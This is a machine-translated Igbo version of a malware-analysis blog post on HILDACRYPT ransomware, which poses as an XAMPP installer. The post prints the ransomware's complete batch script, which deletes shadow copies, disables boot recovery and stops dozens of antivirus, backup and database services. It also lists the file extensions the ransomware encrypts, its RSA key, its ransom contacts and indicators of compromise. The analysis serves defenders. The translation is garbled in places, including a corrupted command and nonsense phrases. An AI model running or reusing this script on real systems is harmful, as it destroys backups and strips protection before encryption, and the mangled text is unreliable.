Ndewo, Habr! Ọzọkwa, anyị na-ekwu maka ụdị malware kachasị ọhụrụ sitere na ụdị Ransomware. HILDACRYPT bụ ihe mgbapụta ọhụrụ, onye otu ezinụlọ Hilda achọtara n'August 2019, aha ya bụ katoon Netflix nke ejiri kesaa ngwanro ahụ. Taa, anyị na-amata atụmatụ teknuzu nke nje ransomware a emelitere.
Na ụdị mbụ nke Hilda ransomware, njikọ nke ezigara na Youtube usoro eserese eserese dị n'akwụkwọ ozi mgbapụta ahụ. HILDACRYPT masquerades dị ka onye nrụnye XAMPP ziri ezi, nkesa Apache dị mfe ịwụnye nke gụnyere MariaDB, PHP, na Perl. N'otu oge ahụ, cryptolocker nwere aha faịlụ dị iche - xamp. Na mgbakwunye, faịlụ ransomware enweghị mbinye aka eletrọnịkị.
Nyocha static
A na-etinye ransomware ahụ n'ime faịlụ PE32 .NET nke e dere maka MS. WindowsNha ya bụ 135,168 bytes. E dere ma koodu mmemme bụ isi na koodu onye nchebe na C#. Dịka stampụ ụbọchị na oge nchịkọta si dị, e mepụtara faịlụ binary na Septemba 14, 2019.
Dị ka Detect It Easy si kwuo, a na-edobe ihe mgbapụta ahụ site na iji Confuser na ConfuserEx, mana ndị obfuscators ndị a bụ otu ihe ahụ dị na mbụ, naanị ConfuserEx bụ onye ga-anọchi Confuser, ya mere ntinye aka koodu ha yiri.
N'ezie HILDACRYPT ejiri ConfuserEx kpokọta ya.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Mmegide vector
O yikarịrị ka achọpụtara ihe mgbapụta ahụ n'otu n'ime saịtị mmemme webụ, na-eyi ka mmemme XAMPP ziri ezi.
Enwere ike ịhụ usoro ọrịa niile na ya .
Mkpuchi
A na-echekwa eriri ransomware n'ụdị ezoro ezo. Mgbe ewepụtara ya, HILDACRYPT decrypts ha site na iji Base64 na AES-256-CBC.
ọnọdụ
Nke mbụ, ihe mgbapụta ahụ na-emepụta nchekwa na% AppDataRoaming% nke GUID (Globally Unique Identifier) na-emepụta ihe na-enweghị usoro. Site na ịgbakwunye faịlụ bat na ebe a, nje ransomware na-eji cmd.exe malite ya:
cmd.exe /c JKfgkgj3hjgfhjka.bat & pụọ
Ọ na-amalite ime ihe odide batch iji gbanyụọ njirimara ma ọ bụ ọrụ sistemụ.
Edemede ahụ nwere ndepụta ogologo nke iwu na-emebi mbipụta onyinyo, gbanyụọ ihe nkesa SQL, ndabere na ngwọta nje.
Dịka ọmụmaatụ, ọ na-agbalị ịkwụsị ọrụ Acronis Backup na agaghị eme nke ọma. Na mgbakwunye, ọ na-awakpo sistemu nkwado ndabere na mpaghara ngwọta antivirus sitere na ndị na-ere ahịa ndị a: Veeam, Sophos, Kaspersky, McAfee na ndị ọzọ.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Ozugbo ọrụ na usoro ndị a kpọtụrụ aha n'elu nwere nkwarụ, cryptolocker na-anakọta ozi gbasara usoro niile na-agba ọsọ site na iji iwu listi ọrụ iji hụ na ọrụ niile dị mkpa dara.
ndepụta ọrụ v/fo csv
Iwu a na-egosiputa ndepụta zuru ezu nke usoro na-agba ọsọ, nke na-ekewa ihe ndị dị na ya site na akara ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Mgbe nlele a gachara, ransomware na-amalite usoro nzuzo.
Izo ya ezo
Izo ya ezo faịlụ
HILDACRYPT na-agafe ọdịnaya niile achọtara nke draịva siri ike, ewezuga nchekwa Recycle.Bin na Reference AssembliesMicrosoft. Nke ikpeazụ nwere dll dị egwu, pdb, wdg. faịlụ maka ngwa .Net nwere ike imetụta ọrụ nke ransomware. Iji chọọ faịlụ ndị a ga-ezoro ezo, a na-eji ndepụta ndọtị ndị a:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ihe mgbapụta ahụ na-eji AES-256-CBC algọridim iji zoo faịlụ ndị ọrụ. Ogo isi bụ 256 ibe n'ibe na mmalite vector (IV) nha bụ 16 bytes.
Na nseta ihuenyo na-esonụ, a na-enweta ụkpụrụ nke byte_2 na byte_1 na-enweghị usoro site na iji GetBytes().
Igodo
N'ime NA
Faịlụ ezoro ezo nwere ndọtị HCY!... Nke a bụ ọmụmaatụ faịlụ ezoro ezo. Emepụtara igodo na IV akpọrọ n'elu maka faịlụ a.
Igodo nzuzo
Ihe mkpuchi crypto na-echekwa igodo AES emepụtara na faịlụ ezoro ezo. Akụkụ mbụ nke faịlụ ezoro ezo nwere nkụnye eji isi mee nke nwere data dị ka HILDACRYPT, KEY, IV, FileLen na usoro XML, ma yie nke a:
A na-eme izo ya ezo AES na IV site na iji RSA-2048, a na-ejikwa Base64 mee koodu ntinye. A na-echekwa igodo ọha RSA n'ime ahụ nke cryptolocker n'otu eriri ezoro ezo na usoro XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
A na-eji igodo ọha RSA iji zoo igodo faịlụ AES. Igodo ọha na eze nke RSA bụ Base64 na-edobere ma nwee modul na okwu ọha nke 65537. Mwepu chọrọ igodo nzuzo RSA, nke onye mwakpo ahụ nwere.
Mgbe izo ya ezo RSA, a na-edobe igodo AES site na iji Base64 echekwara na faịlụ ezoro ezo.
Ozi mgbapụta
Ozugbo ezoro ezo zuru ezu, HILDACRYPT na-ede faịlụ HTML na nchekwa ebe o zoro faịlụ ndị ahụ. Ihe ngosi ihe mgbapụta ahụ nwere adreesị ozi-e abụọ ebe onye ihe metụtara nwere ike ịkpọtụrụ onye mwakpo ahụ.
- hildalolilovesyou@airmail.cc
hildalolilovesyou@memeware.net
Ozi ịpụnara mmadụ nwekwara ahịrị “Ọ dịghị loli dị mma;)” - ntụaka maka mkpụrụedemede anime na manga nwere ọdịdị ụmụ agbọghọ amachibidoro na Japan.
nkwubi
HILDACRYPT, ezinụlọ ọhụrụ nke ransomware, ewepụtala ụdị ọhụrụ. Ụdị ezoro ezo na-egbochi onye a tara ahụhụ idepụta faịlụ ndị ransomware ezoro ezo. Cryptolocker na-eji ụzọ nchebe na-arụ ọrụ iji gbanyụọ ọrụ nchebe metụtara sistemu ndabere yana ngwọta nje. Onye dere HILDACRYPT bụ onye na-akwado usoro ihe nkiri Hilda, nke egosiri na Netflix, njikọ nke ụgbọala na-adọkpụ nke dị n'akwụkwọ ozi ịzụrụ maka ụdị mmemme a gara aga.
Ka ọ dị na mbụ, и nwere ike ichekwa kọmputa gị na HILDACRYPT ransomware, na ndị na-enye ọrụ nwere ike iji chebe ndị ahịa ha . A na-echekwa nchebe site n'eziokwu na ngwọta ndị a gụnyere na-agụnye ọ bụghị naanị ndabere, kamakwa anyị agbakwunyere nche usoro - Kwadoro site na ụdị mmụta igwe ma dabere na omume heuristics omume, teknụzụ nwere ike iguzogide iyi egwu nke ihe mgbapụta ụbọchị efu dị ka ọ nweghị ọzọ.
Ndị na -egosi nkwenye
Mgbakwunye faịlụ HCY!
HIDACRYPT GụọMe.html
xamp.exe nwere otu mkpụrụedemede "p" na enweghị mbinye aka dijitalụ
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
isi: www.habr.com
